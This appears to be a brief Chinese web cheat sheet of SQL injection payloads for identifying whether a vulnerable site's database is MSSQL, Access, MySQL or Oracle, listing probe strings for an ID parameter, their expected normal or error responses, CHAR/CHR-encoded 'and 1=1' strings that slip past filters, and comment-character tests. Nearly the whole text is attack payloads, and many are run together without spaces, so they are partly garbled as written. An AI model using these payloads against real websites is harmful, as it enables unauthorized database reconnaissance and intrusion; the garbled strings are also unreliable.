0x01:MSSQL
ID=1and(selectcount(*)fromsysobjects)>0返回正常
ID=1and(selectcount(*)frommsysobjects)>0返回异常
ID=1andleft(version(),1)=5%23//红色字体也可能是4
ID=1andexists(selectidfromsysobjects)
ID=1andlength(user)>0
ID=1CHAR(97) +CHAR(110) +CHAR(100) +CHAR(32) +CHAR(49) +CHAR(61) +CHAR(49)
0x02:ACCESS
ID=1and(selectcount(*)fromsysobjects)>0返回异常
ID=1and(selectcount(*)frommsysobjects)>0返回异常
0x03:MYSQL
id=2andversion()>0返回正常
id=2andlength(user())>0
id=2CHAR(97,110,100,32,49,61,49)
0x04:ORACLE
ID=1and'1'||'1'='11
ID=1and0<>(selectcount(*)fromdual)
ID=1CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
0x05:其他方法
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
“--”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
网友评论